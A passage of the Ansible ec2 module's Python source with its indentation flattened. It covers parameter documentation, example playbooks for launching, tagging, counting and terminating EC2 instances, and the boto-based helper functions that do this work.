- opaque blob of data which is made available to the ec2 instance
required: false
default: null
aliases: []
instance_tags:
version_added: "1.0"
description:
- a hash/dictionary of tags to add to the new instance or for starting/stopping instance by tag; '{"key":"value"}' and '{"key":"value","key":"value"}'
required: false
default: null
aliases: []
placement_group:
version_added: "1.3"
description:
- placement group for the instance when using EC2 Clustered Compute
required: false
default: null
aliases: []
vpc_subnet_id:
version_added: "1.1"
description:
- the subnet ID in which to launch the instance (VPC)
required: false
default: null
aliases: []
assign_public_ip:
version_added: "1.5"
description:
- when provisioning within vpc, assign a public IP address. Boto library must be 2.13.0+
required: false
default: no
choices: [ "yes", "no" ]
aliases: []
private_ip:
version_added: "1.2"
description:
- the private ip address to assign the instance (from the vpc subnet)
required: false
default: null
aliases: []
instance_profile_name:
version_added: "1.3"
description:
- Name of the IAM instance profile to use. Boto library must be 2.5.0+
required: false
default: null
aliases: []
instance_ids:
version_added: "1.3"
description:
- "list of instance ids, currently used for states: absent, running, stopped"
required: false
default: null
aliases: ['instance_id']
source_dest_check:
version_added: "1.6"
description:
- Enable or Disable the Source/Destination checks (for NAT instances and Virtual Routers)
required: false
default: yes
choices: [ "yes", "no" ]
termination_protection:
version_added: "2.0"
description:
- Enable or Disable the Termination Protection
required: false
default: no
choices: [ "yes", "no" ]
instance_initiated_shutdown_behavior:
version_added: "2.2"
description:
- Set whether AWS will Stop or Terminate an instance on shutdown. This parameter is ignored when using instance-store
images (which require termination on shutdown).
required: false
default: 'stop'
choices: [ "stop", "terminate" ]
state:
version_added: "1.3"
description:
- create or terminate instances
required: false
default: 'present'
aliases: []
choices: ['present', 'absent', 'running', 'restarted', 'stopped']
volumes:
version_added: "1.5"
description:
- a list of hash/dictionaries of volumes to add to the new instance; '[{"key":"value", "key":"value"}]'; keys allowed
are - device_name (str; required), delete_on_termination (bool; False), device_type (deprecated), ephemeral (str),
encrypted (bool; False), snapshot (str), volume_type (str), iops (int) - device_type is deprecated use volume_type,
iops must be set when volume_type='io1', ephemeral and snapshot are mutually exclusive.
required: false
default: null
aliases: []
ebs_optimized:
version_added: "1.6"
description:
- whether instance is using optimized EBS volumes, see U(http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSOptimized.html)
required: false
default: 'false'
exact_count:
version_added: "1.5"
description:
- An integer value which indicates how many instances that match the 'count_tag' parameter should be running.
Instances are either created or terminated based on this value.
required: false
default: null
aliases: []
count_tag:
version_added: "1.5"
description:
- Used with 'exact_count' to determine how many nodes based on a specific tag criteria should be running.
This can be expressed in multiple ways and is shown in the EXAMPLES section. For instance, one can request 25 servers
that are tagged with "class=webserver". The specified tag must already exist or be passed in as the 'instance_tags' option.
required: false
default: null
aliases: []
network_interfaces:
version_added: "2.0"
description:
- A list of existing network interfaces to attach to the instance at launch. When specifying existing network interfaces,
none of the assign_public_ip, private_ip, vpc_subnet_id, group, or group_id parameters may be used. (Those parameters are
for creating a new network interface at launch.)
required: false
default: null
aliases: ['network_interface']
spot_launch_group:
version_added: "2.1"
description:
- Launch group for spot request, see U(http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/how-spot-instances-work.html#spot-launch-group)
required: false
default: null
author:
- "Tim Gerla (@tgerla)"
- "Lester Wade (@lwade)"
- "Seth Vidal"
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Basic provisioning example
- ec2:
key_name: mykey
instance_type: t2.micro
image: ami-123456
wait: yes
group: webserver
count: 3
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Advanced example with tagging and CloudWatch
- ec2:
key_name: mykey
group: databases
instance_type: t2.micro
image: ami-123456
wait: yes
wait_timeout: 500
count: 5
instance_tags:
db: postgres
monitoring: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Single instance with additional IOPS volume from snapshot and volume delete on termination
- ec2:
key_name: mykey
group: webserver
instance_type: c3.medium
image: ami-123456
wait: yes
wait_timeout: 500
volumes:
- device_name: /dev/sdb
snapshot: snap-abcdef12
volume_type: io1
iops: 1000
volume_size: 100
delete_on_termination: true
monitoring: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Single instance with ssd gp2 root volume
- ec2:
key_name: mykey
group: webserver
instance_type: c3.medium
image: ami-123456
wait: yes
wait_timeout: 500
volumes:
- device_name: /dev/xvda
volume_type: gp2
volume_size: 8
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
count_tag:
Name: dbserver
exact_count: 1
# Multiple groups example
- ec2:
key_name: mykey
group: ['databases', 'internal-services', 'sshable', 'and-so-forth']
instance_type: m1.large
image: ami-6e649707
wait: yes
wait_timeout: 500
count: 5
instance_tags:
db: postgres
monitoring: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Multiple instances with additional volume from snapshot
- ec2:
key_name: mykey
group: webserver
instance_type: m1.large
image: ami-6e649707
wait: yes
wait_timeout: 500
count: 5
volumes:
- device_name: /dev/sdb
snapshot: snap-abcdef12
volume_size: 10
monitoring: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Dedicated tenancy example
- local_action:
module: ec2
assign_public_ip: yes
group_id: sg-1dc53f72
key_name: mykey
image: ami-6e649707
instance_type: m1.small
tenancy: dedicated
vpc_subnet_id: subnet-29e63245
wait: yes
# Spot instance example
- ec2:
spot_price: 0.24
spot_wait_timeout: 600
keypair: mykey
group_id: sg-1dc53f72
instance_type: m1.small
image: ami-6e649707
wait: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
spot_launch_group: report_generators
# Examples using pre-existing network interfaces
- ec2:
key_name: mykey
instance_type: t2.small
image: ami-f005ba11
network_interface: eni-deadbeef
- ec2:
key_name: mykey
instance_type: t2.small
image: ami-f005ba11
network_interfaces: ['eni-deadbeef', 'eni-5ca1ab1e']
# Launch instances, runs some tasks
# and then terminate them
- name: Create a sandbox instance
hosts: localhost
gather_facts: False
vars:
key_name: my_keypair
instance_type: m1.small
security_group: my_securitygroup
image: my_ami_id
region: us-east-1
tasks:
- name: Launch instance
ec2:
key_name: "{{ keypair }}"
group: "{{ security_group }}"
instance_type: "{{ instance_type }}"
image: "{{ image }}"
wait: true
region: "{{ region }}"
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
register: ec2
- name: Add new instance to host group
add_host:
hostname: "{{ item.public_ip }}"
groupname: launched
with_items: "{{ ec2.instances }}"
- name: Wait for SSH to come up
wait_for:
host: "{{ item.public_dns_name }}"
port: 22
delay: 60
timeout: 320
state: started
with_items: "{{ ec2.instances }}"
- name: Configure instance(s)
hosts: launched
become: True
gather_facts: True
roles:
- my_awesome_role
- my_awesome_test
- name: Terminate instances
hosts: localhost
connection: local
tasks:
- name: Terminate instances that were previously launched
ec2:
state: 'absent'
instance_ids: '{{ ec2.instance_ids }}'
# Start a few existing instances, run some tasks
# and stop the instances
- name: Start sandbox instances
hosts: localhost
gather_facts: false
connection: local
vars:
instance_ids:
- 'i-xxxxxx'
- 'i-xxxxxx'
- 'i-xxxxxx'
region: us-east-1
tasks:
- name: Start the sandbox instances
ec2:
instance_ids: '{{ instance_ids }}'
region: '{{ region }}'
state: running
wait: True
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
roles:
- do_neat_stuff
- do_more_neat_stuff
- name: Stop sandbox instances
hosts: localhost
gather_facts: false
connection: local
vars:
instance_ids:
- 'i-xxxxxx'
- 'i-xxxxxx'
- 'i-xxxxxx'
region: us-east-1
tasks:
- name: Stop the sandbox instances
ec2:
instance_ids: '{{ instance_ids }}'
region: '{{ region }}'
state: stopped
wait: True
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
#
# Start stopped instances specified by tag
#
- local_action:
module: ec2
instance_tags:
Name: ExtraPower
state: running
#
# Restart instances specified by tag
#
- local_action:
module: ec2
instance_tags:
Name: ExtraPower
state: restarted
#
# Enforce that 5 instances with a tag "foo" are running
# (Highly recommended!)
#
- ec2:
key_name: mykey
instance_type: c1.medium
image: ami-40603AD1
wait: yes
group: webserver
instance_tags:
foo: bar
exact_count: 5
count_tag: foo
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
#
# Enforce that 5 running instances named "database" with a "dbtype" of "postgres"
#
- ec2:
key_name: mykey
instance_type: c1.medium
image: ami-40603AD1
wait: yes
group: webserver
instance_tags:
Name: database
dbtype: postgres
exact_count: 5
count_tag:
Name: database
dbtype: postgres
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
#
# count_tag complex argument examples
#
# instances with tag foo
count_tag:
foo:
# instances with tag foo=bar
count_tag:
foo: bar
# instances with tags foo=bar & baz
count_tag:
foo: bar
baz:
# instances with tags foo & bar & baz=bang
count_tag:
- foo
- bar
- baz: bang
'''
import traceback
import time
from ast import literal_eval
from ansible.module_utils.six import get_function_code, string_types
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import get_aws_connection_info, ec2_argument_spec, ec2_connect
from distutils.version import LooseVersion
from ansible.module_utils.six import string_types
try:
import boto.ec2
from boto.ec2.blockdevicemapping import BlockDeviceType, BlockDeviceMapping
from boto.exception import EC2ResponseError
from boto import connect_ec2_endpoint
from boto import connect_vpc
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def find_running_instances_by_count_tag(module, ec2, vpc, count_tag, zone=None):
# get reservations for instances that match tag(s) and are running
reservations = get_reservations(module, ec2, vpc, tags=count_tag, state="running", zone=zone)
instances = []
for res in reservations:
if hasattr(res, 'instances'):
for inst in res.instances:
instances.append(inst)
return reservations, instances
def _set_none_to_blank(dictionary):
result = dictionary
for k in result:
if isinstance(result[k], dict):
result[k] = _set_none_to_blank(result[k])
elif not result[k]:
result[k] = ""
return result
def get_reservations(module, ec2, vpc, tags=None, state=None, zone=None):
# TODO: filters do not work with tags that have underscores
filters = dict()
vpc_subnet_id = module.params.get('vpc_subnet_id')
vpc_id = None
if vpc_subnet_id:
filters.update({"subnet-id": vpc_subnet_id})
if vpc:
vpc_id = vpc.get_all_subnets(subnet_ids=[vpc_subnet_id])[0].vpc_id
if vpc_id:
filters.update({"vpc-id": vpc_id})
if tags is not None:
if isinstance(tags, str):
try:
tags = literal_eval(tags)
except:
pass
# if string, we only care that a tag of that name exists
if isinstance(tags, str):
filters.update({"tag-key": tags})
# if list, append each item to filters
if isinstance(tags, list):
for x in tags:
if isinstance(x, dict):
x = _set_none_to_blank(x)
filters.update(dict(("tag:" + tn, tv) for (tn, tv) in x.items()))
else:
filters.update({"tag-key": x})
# if dict, add the key and value to the filter
if isinstance(tags, dict):
tags = _set_none_to_blank(tags)
filters.update(dict(("tag:" + tn, tv) for (tn, tv) in tags.items()))
if state:
# http://stackoverflow.com/questions/437511/what-are-the-valid-instancestates-for-the-amazon-ec2-api
filters.update({'instance-state-name': state})
if zone:
filters.update({'availability-zone': zone})
if module.params.get('id'):
filters['client-token'] = module.params['id']
results = ec2.get_all_instances(filters=filters)
return results
def get_instance_info(inst):
"""
Retrieves instance information from an instance
ID and returns it as a dictionary
"""
instance_info = {'id': inst.id,
'ami_launch_index': inst.ami_launch_index,
'private_ip': inst.private_ip_address,
'private_dns_name': inst.private_dns_name,
'public_ip': inst.ip_address,
'dns_name': inst.dns_name,
'public_dns_name': inst.public_dns_name,
'state_code': inst.state_code,
'architecture': inst.architecture,
'image_id': inst.image_id,
'key_name': inst.key_name,
'placement': inst.placement,
'region': inst.placement[:-1],
'kernel': inst.kernel,
'ramdisk': inst.ramdisk,
'launch_time': inst.launch_time,
'instance_type': inst.instance_type,
'root_device_type': inst.root_device_type,
'root_device_name': inst.root_device_name,
'state': inst.state,
'hypervisor': inst.hypervisor,
'tags': inst.tags,
'groups': dict((group.id, group.name) for group in inst.groups),
}
try:
instance_info['virtualization_type'] = getattr(inst, 'virtualization_type')
except AttributeError:
instance_info['virtualization_type'] = None
try:
instance_info['ebs_optimized'] = getattr(inst, 'ebs_optimized')
except AttributeError:
instance_info['ebs_optimized'] = False
try:
bdm_dict = {}
bdm = getattr(inst, 'block_device_mapping')
for device_name in bdm.keys():
bdm_dict[device_name] = {
'status': bdm[device_name].status,
'volume_id': bdm[device_name].volume_id,
'delete_on_termination': bdm[device_name].delete_on_termination
}
instance_info['block_device_mapping'] = bdm_dict
except AttributeError:
instance_info['block_device_mapping'] = False
try:
instance_info['tenancy'] = getattr(inst, 'placement_tenancy')
except AttributeError:
instance_info['tenancy'] = 'default'
return instance_info
def boto_supports_associate_public_ip_address(ec2):
"""
Check if Boto library has associate_public_ip_address in the NetworkInterfaceSpecification
class. Added in Boto 2.13.0
ec2: authenticated ec2 connection object
Returns:
True if Boto library accepts associate_public_ip_address argument, else false
"""
try:
network_interface = boto.ec2.networkinterface.NetworkInterfaceSpecification()
getattr(network_interface, "associate_public_ip_address")
return True
except AttributeError:
return False
def boto_supports_profile_name_arg(ec2):
"""
Check if Boto library has instance_profile_name argument. instance_profile_name has been added in Boto 2.5.0
ec2: authenticated ec2 connection object
Returns:
True if Boto library accept instance_profile_name argument, else false
"""
run_instances_method = getattr(ec2, 'run_instances')
return 'instance_profile_name' in get_function_code(run_instances_method).co_varnames
def boto_supports_volume_encryption():
"""
Check if Boto library supports encryption of EBS volumes (added in 2.29.0)
Returns:
True if boto library has the named param as an argument on the request_spot_instances method, else False
"""
return hasattr(boto, 'Version') and LooseVersion(boto.Version) >= LooseVersion('2.29.0')
def create_block_device(module, ec2, volume):
# Not aware of a way to determine this programatically
# http://aws.amazon.com/about-aws/whats-new/2013/10/09/ebs-provisioned-iops-maximum-iops-gb-ratio-increased-to-30-1/
MAX_IOPS_TO_SIZE_RATIO = 30
# device_type has been used historically to represent volume_type,
# however ec2_vol uses volume_type, as does the BlockDeviceType, so
# we add handling for either/or but not both
if all(key in volume for key in ['device_type', 'volume_type']):
module.fail_json(msg='device_type is a deprecated name for volume_type. Do not use both device_type and volume_type')
# get whichever one is set, or NoneType if neither are set
volume_type = volume.get('device_type') or volume.get('volume_type')
if 'snapshot' not in volume and 'ephemeral' not in volume:
if 'volume_size' not in volume:
module.fail_json(msg='Size must be specified when creating a new volume or modifying the root volume')
if 'snapshot' in volume:
if volume_type == 'io1' and 'iops' not in volume:
module.fail_json(msg='io1 volumes must have an iops value set')
if 'iops' in volume:
snapshot = ec2.get_all_snapshots(snapshot_ids=[volume['snapshot']])[0]
size = volume.get('volume_size', snapshot.volume_size)
if int(volume['iops']) > MAX_IOPS_TO_SIZE_RATIO * size:
module.fail_json(msg='IOPS must be at most %d times greater than size' % MAX_IOPS_TO_SIZE_RATIO)
if 'encrypted' in volume:
module.fail_json(msg='You can not set encryption when creating a volume from a snapshot')
if 'ephemeral' in volume:
if 'snapshot' in volume:
module.fail_json(msg='Cannot set both ephemeral and snapshot')
if boto_supports_volume_encryption():
return BlockDeviceType(snapshot_id=volume.get('snapshot'),
ephemeral_name=volume.get('ephemeral'),
size=volume.get('volume_size'),
volume_type=volume_type,
delete_on_termination=volume.get('delete_on_termination', False),
iops=volume.get('iops'),
encrypted=volume.get('encrypted', None))
else:
return BlockDeviceType(snapshot_id=volume.get('snapshot'),
ephemeral_name=volume.get('ephemeral'),
size=volume.get('volume_size'),
volume_type=volume_type,
delete_on_termination=volume.get('delete_on_termination', False),
iops=volume.get('iops'))
def boto_supports_param_in_spot_request(ec2, param):
"""
Check if Boto library has a <param> in its request_spot_instances() method. For example, the placement_group parameter wasn't added until 2.3.0.
ec2: authenticated ec2 connection object
Returns:
True if boto library has the named param as an argument on the request_spot_instances method, else False
"""
method = getattr(ec2, 'request_spot_instances')
return param in get_function_code(method).co_varnames
def await_spot_requests(module, ec2, spot_requests, count):
"""
Wait for a group of spot requests to be fulfilled, or fail.
module: Ansible module object
ec2: authenticated ec2 connection object
spot_requests: boto.ec2.spotinstancerequest.SpotInstanceRequest object returned by ec2.request_spot_instances
count: Total number of instances to be created by the spot requests
Returns:
list of instance ID's created by the spot request(s)
"""
spot_wait_timeout = int(module.params.get('spot_wait_timeout'))
wait_complete = time.time() + spot_wait_timeout
spot_req_inst_ids = dict()
while time.time() < wait_complete:
reqs = ec2.get_all_spot_instance_requests()
for sirb in spot_requests:
if sirb.id in spot_req_inst_ids:
continue
for sir in reqs:
if sir.id != sirb.id:
continue # this is not our spot instance
if sir.instance_id is not None:
spot_req_inst_ids[sirb.id] = sir.instance_id
elif sir.state == 'open':
continue # still waiting, nothing to do here
elif sir.state == 'active':
continue # Instance is created already, nothing to do here
elif sir.state == 'failed':
module.fail_json(msg="Spot instance request %s failed with status %s and fault %s:%s" % (
sir.id, sir.status.code, sir.fault.code, sir.fault.message))
elif sir.state == 'cancelled':
module.fail_json(msg="Spot instance request %s was cancelled before it could be fulfilled." % sir.id)
elif sir.state == 'closed':
# instance is terminating or marked for termination
# this may be intentional on the part of the operator,
# or it may have been terminated by AWS due to capacity,
# price, or group constraints in this case, we'll fail
# the module if the reason for the state is anything
# other than termination by user. Codes are documented at
# http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/spot-bid-status.html
if sir.status.code == 'instance-terminated-by-user':
# do nothing, since the user likely did this on purpose
pass
else:
spot_msg = "Spot instance request %s was closed by AWS with the status %s and fault %s:%s"
module.fail_json(msg=spot_msg % (sir.id, sir.status.code, sir.fault.code, sir.fault.message))
if len(spot_req_inst_ids) < count:
time.sleep(5)
else:
return list(spot_req_inst_ids.values())
module.fail_json(msg="wait for spot requests timeout on %s" % time.asctime())
def enforce_count(module, ec2, vpc):
exact_count = module.params.get('exact_count')
count_tag = module.params.get('count_tag')
zone = module.params.get('zone')
# fail here if the exact count was specified without filtering
# on a tag, as this may lead to a undesired removal of instances
if exact_count and count_tag is None:
module.fail_json(msg="you must use the 'count_tag' option with exact_count")
reservations, instances = find_running_instances_by_count_tag(module, ec2, vpc, count_tag, zone)
changed = None
checkmode = False
instance_dict_array = []
changed_instance_ids = None
if len(instances) == exact_count:
changed = False
elif len(instances) < exact_count:
changed = True
to_create = exact_count - len(instances)
if not checkmode:
(instance_dict_array, changed_instance_ids, changed) \
= create_instances(module, ec2, vpc, override_count=to_create)
for inst in instance_dict_array:
instances.append(inst)
elif len(instances) > exact_count:
changed = True
to_remove = len(instances) - exact_count
if not checkmode:
all_instance_ids = sorted([x.id for x in instances])
remove_ids = all_instance_ids[0:to_remove]
instances = [x for x in instances if x.id not in remove_ids]
(changed, instance_dict_array, changed_instance_ids) \
= terminate_instances(module, ec2, remove_ids)
terminated_list = []
for inst in instance_dict_array:
inst['state'] = "terminated"
terminated_list.append(inst)
instance_dict_array = terminated_list
# ensure all instances are dictionaries
all_instances = []
for inst in instances:
if not isinstance(inst, dict):
inst = get_instance_info(inst)
all_instances.append(inst)
return (all_instances, instance_dict_array, changed_instance_ids, changed)
def create_instances(module, ec2, vpc, override_count=None):
"""
Creates new instances
module : AnsibleModule object
ec2: authenticated ec2 connection object
Returns:
A list of dictionaries with instance information
about the instances that were launched
"""
key_name = module.params.get('key_name')
id = module.params.get('id')
group_name = module.params.get('group')
group_id = module.params.get('group_id')
zone = module.params.get('zone')
instance_type = module.params.get('instance_type')
tenancy = module.params.get('tenancy')
spot_price = module.params.get('spot_price')
spot_type = module.params.get('spot_type')
image = module.params.get('image')
if override_count:
count = override_count
else:
count = module.params.get('count')
monitoring = module.params.get('monitoring')
kernel = module.params.get('kernel')
ramdisk = module.params.get('ramdisk')
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
spot_wait_timeout = int(module.params.get('spot_wait_timeout'))
placement_group = module.params.get('placement_group')
user_data = module.params.get('user_data')
instance_tags = module.params.get('instance_tags')
vpc_subnet_id = module.params.get('vpc_subnet_id')
assign_public_ip = module.boolean(module.params.get('assign_public_ip'))
private_ip = module.params.get('private_ip')
instance_profile_name = module.params.get('instance_profile_name')
volumes = module.params.get('volumes')
ebs_optimized = module.params.get('ebs_optimized')
exact_count = module.params.get('exact_count')
count_tag = module.params.get('count_tag')
source_dest_check = module.boolean(module.params.get('source_dest_check'))
termination_protection = module.boolean(module.params.get('termination_protection'))
network_interfaces = module.params.get('network_interfaces')
spot_launch_group = module.params.get('spot_launch_group')
instance_initiated_shutdown_behavior = module.params.get('instance_initiated_shutdown_behavior')
vpc_id = None
if vpc_subnet_id:
if not vpc:
module.fail_json(msg="region must be specified")
else:
vpc_id = vpc.get_all_subnets(subnet_ids=[vpc_subnet_id])[0].vpc_id
else:
vpc_id = None
try:
# Here we try to lookup the group id from the security group name - if group is set.
if group_name:
if vpc_id:
grp_details = ec2.get_all_security_groups(filters={'vpc_id': vpc_id})
else:
grp_details = ec2.get_all_security_groups()
if isinstance(group_name, string_types):
group_name = [group_name]
unmatched = set(group_name).difference(str(grp.name) for grp in grp_details)
if len(unmatched) > 0:
module.fail_json(msg="The following group names are not valid: %s" % ', '.join(unmatched))
group_id = [str(grp.id) for grp in grp_details if str(grp.name) in group_name]
# Now we try to lookup the group id testing if group exists.
elif group_id:
# wrap the group_id in a list if it's not one already
if isinstance(group_id, string_types):
group_id = [group_id]
grp_details = ec2.get_all_security_groups(group_ids=group_id)
group_name = [grp_item.name for grp_item in grp_details]
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg=str(e))
# Lookup any instances that much our run id.
running_instances = []
count_remaining = int(count)
if id is not None:
filter_dict = {'client-token': id, 'instance-state-name': 'running'}
previous_reservations = ec2.get_all_instances(None, filter_dict)
for res in previous_reservations:
for prev_instance in res.instances:
running_instances.append(prev_instance)
count_remaining = count_remaining - len(running_instances)
# Both min_count and max_count equal count parameter. This means the launch request is explicit (we want count, or fail) in how many instances we want.
if count_remaining == 0:
changed = False
else:
changed = True
try:
params = {'image_id': image,
'key_name': key_name,
'monitoring_enabled': monitoring,
'placement': zone,
'instance_type': instance_type,
'kernel_id': kernel,
'ramdisk_id': ramdisk,
'user_data': user_data}
if ebs_optimized:
params['ebs_optimized'] = ebs_optimized
# 'tenancy' always has a default value, but it is not a valid parameter for spot instance request
if not spot_price:
params['tenancy'] = tenancy
if boto_supports_profile_name_arg(ec2):
params['instance_profile_name'] = instance_profile_name
else:
if instance_profile_name is not None:
module.fail_json(
msg="instance_profile_name parameter requires Boto version 2.5.0 or higher")
if assign_public_ip:
if not boto_supports_associate_public_ip_address(ec2):
module.fail_json(
msg="assign_public_ip parameter requires Boto version 2.13.0 or higher.")
elif not vpc_subnet_id:
module.fail_json(
msg="assign_public_ip only available with vpc_subnet_id")
else:
if private_ip:
interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(
subnet_id=vpc_subnet_id,
private_ip_address=private_ip,
groups=group_id,
associate_public_ip_address=assign_public_ip)
else:
interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(
subnet_id=vpc_subnet_id,
groups=group_id,
associate_public_ip_address=assign_public_ip)
interfaces = boto.ec2.networkinterface.NetworkInterfaceCollection(interface)
params['network_interfaces'] = interfaces
else:
if network_interfaces:
if isinstance(network_interfaces, string_types):
network_interfaces = [network_interfaces]
interfaces = []
for i, network_interface_id in enumerate(network_interfaces):
interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(
network_interface_id=network_interface_id,
device_index=i)
interfaces.append(interface)
params['network_interfaces'] = \
boto.ec2.networkinterface.NetworkInterfaceCollection(*interfaces)
else:
params['subnet_id'] = vpc_subnet_id
if vpc_subnet_id:
params['security_group_ids'] = group_id
else:
params['security_groups'] = group_name
if volumes:
bdm = BlockDeviceMapping()
for volume in volumes:
if 'device_name' not in volume:
module.fail_json(msg='Device name must be set for volume')
# Minimum volume size is 1GB. We'll use volume size explicitly set to 0
# to be a signal not to create this volume
if 'volume_size' not in volume or int(volume['volume_size']) > 0:
bdm[volume['device_name']] = create_block_device(module, ec2, volume)
params['block_device_map'] = bdm
# check to see if we're using spot pricing first before starting instances
if not spot_price:
if assign_public_ip and private_ip:
params.update(
dict(
min_count=count_remaining,
max_count=count_remaining,
client_token=id,
placement_group=placement_group,
)
)
else:
params.update(
dict(
min_count=count_remaining,
max_count=count_remaining,
client_token=id,
placement_group=placement_group,
private_ip_address=private_ip,
)
)
# For ordinary (not spot) instances, we can select 'stop'
# (the default) or 'terminate' here.
params['instance_initiated_shutdown_behavior'] = instance_initiated_shutdown_behavior or 'stop'
try:
res = ec2.run_instances(**params)
except boto.exception.EC2ResponseError as e:
if (params['instance_initiated_shutdown_behavior'] != 'terminate' and
"InvalidParameterCombination" == e.error_code):
params['instance_initiated_shutdown_behavior'] = 'terminate'
res = ec2.run_instances(**params)
else:
raise
instids = [i.id for i in res.instances]
while True:
try:
ec2.get_all_instances(instids)
break
except boto.exception.EC2ResponseError as e:
if "<Code>InvalidInstanceID.NotFound</Code>" in str(e):
# there's a race between start and get an instance
continue
else:
module.fail_json(msg=str(e))
# The instances returned through ec2.run_instances above can be in
# terminated state due to idempotency. See commit 7f11c3d for a complete
# explanation.
terminated_instances = [
str(instance.id) for instance in res.instances if instance.state == 'terminated'
]
if terminated_instances:
module.fail_json(msg="Instances with id(s) %s " % terminated_instances +
"were created previously but have since been terminated - " +
"use a (possibly different) 'instanceid' parameter")
else:
if private_ip:
module.fail_json(
msg='private_ip only available with on-demand (non-spot) instances')
if boto_supports_param_in_spot_request(ec2, 'placement_group'):
params['placement_group'] = placement_group
elif placement_group:
module.fail_json(
msg="placement_group parameter requires Boto version 2.3.0 or higher.")
# You can't tell spot instances to 'stop'; they will always be
# 'terminate'd. For convenience, we'll ignore the latter value.
if instance_initiated_shutdown_behavior and instance_initiated_shutdown_behavior != 'terminate':
module.fail_json(
msg="instance_initiated_shutdown_behavior=stop is not supported for spot instances.")
if spot_launch_group and isinstance(spot_launch_group, string_types):
params['launch_group'] = spot_launch_group
params.update(dict(
count=count_remaining,
type=spot_type,
))
res = ec2.request_spot_instances(spot_price, **params)
# Now we have to do the intermediate waiting
if wait:
instids = await_spot_requests(module, ec2, res, count)
else:
instids = []
except boto.exception.BotoServerError as e:
module.fail_json(msg="Instance creation failed => %s: %s" % (e.error_code, e.error_message))
# wait here until the instances are up
num_running = 0
wait_timeout = time.time() + wait_timeout
res_list = ()
while wait_timeout > time.time() and num_running < len(instids):
try:
res_list = ec2.get_all_instances(instids)
except boto.exception.BotoServerError as e:
if e.error_code == 'InvalidInstanceID.NotFound':
time.sleep(1)
continue
else:
raise
num_running = 0
for res in res_list:
num_running += len([i for i in res.instances if i.state == 'running'])
if len(res_list) <= 0:
# got a bad response of some sort, possibly due to
# stale/cached data. Wait a second and then try again
time.sleep(1)
continue
if wait and num_running < len(instids):
time.sleep(5)
else:
break
if wait and wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg="wait for instances running timeout on %s" % time.asctime())
# We do this after the loop ends so that we end up with one list
for res in res_list:
running_instances.extend(res.instances)
# Enabled by default by AWS
if source_dest_check is False:
for inst in res.instances:
inst.modify_attribute('sourceDestCheck', False)
# Disabled by default by AWS
if termination_protection is True:
for inst in res.instances:
inst.modify_attribute('disableApiTermination', True)
# Leave this as late as possible to try and avoid InvalidInstanceID.NotFound
if instance_tags and instids:
try:
ec2.create_tags(instids, instance_tags)
except boto.exception.EC2ResponseError as e:
module.fail_json(msg="Instance tagging failed => %s: %s" % (e.error_code, e.error_message))
instance_dict_array = []
created_instance_ids = []
for inst in running_instances:
inst.update()
d = get_instance_info(inst)
created_instance_ids.append(inst.id)
instance_dict_array.append(d)
return (instance_dict_array, created_instance_ids, changed)
def terminate_instances(module, ec2, instance_ids):
"""
Terminates a list of instances
module: Ansible module object
ec2: authenticated ec2 connection object
termination_list: a list of instances to terminate in the form of
[ {id: <inst-id>}, ..]
Returns a dictionary of instance information
about the instances terminated.
If the instance to be terminated is running
"changed" will be set to False.
"""
# Whether to wait for termination to complete before returning
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
changed = False
instance_dict_array = []
if not isinstance(instance_ids, list) or len(instance_ids) < 1:
module.fail_json(msg='instance_ids should be a list of instances, aborting')
terminated_instance_ids = []
for res in ec2.get_all_instances(instance_ids):
for inst in res.instances:
if inst.state == 'running' or inst.state == 'stopped':
terminated_instance_ids.append(inst.id)
instance_dict_array.append(get_instance_info(inst))
try:
ec2.terminate_instances([inst.id])
except EC2ResponseError as e:
module.fail_json(msg='Unable to terminate instance {0}, error: {1}'.format(inst.id, e))
changed = True
# wait here until the instances are 'terminated'
if wait:
num_terminated = 0
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time() and num_terminated < len(terminated_instance_ids):
response = ec2.get_all_instances(instance_ids=terminated_instance_ids,
filters={'instance-state-name': 'terminated'})
try:
num_terminated = sum([len(res.instances) for res in response])
except Exception as e:
# got a bad response of some sort, possibly due to
# stale/cached data. Wait a second and then try again
time.sleep(1)
continue
if num_terminated < len(terminated_instance_ids):
time.sleep(5)
# waiting took too long
if wait_timeout < time.time() and num_terminated < len(terminated_instance_ids):
module.fail_json(msg="wait for instance termination timeout on %s" % time.asctime())
# Lets get the current state of the instances after terminating - issue600
instance_dict_array = []
for res in ec2.get_all_instances(instance_ids=terminated_instance_ids, filters={'instance-state-name': 'terminated'}):
for inst in res.instances:
instance_dict_array.append(get_instance_info(inst))
return (changed, instance_dict_array, terminated_instance_ids)
def startstop_instances(module, ec2, instance_ids, state, instance_tags):
"""
Starts or stops a list of existing instances
module: Ansible module object
ec2: authenticated ec2 connection object
instance_ids: The list of instances to start in the form of
[ {id: <inst-id>}, ..]
instance_tags: A dict of tag keys and values in the form of
{key: value, ... }
state: Intended state ("running" or "stopped")
Returns a dictionary of instance information
about the instances started/stopped.
If the instance was not able to change state,
"changed" will be set to False.
Note that if instance_ids and instance_tags are both non-empty,
this method will process the intersection of the two
"""
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
source_dest_check = module.params.get('source_dest_check')
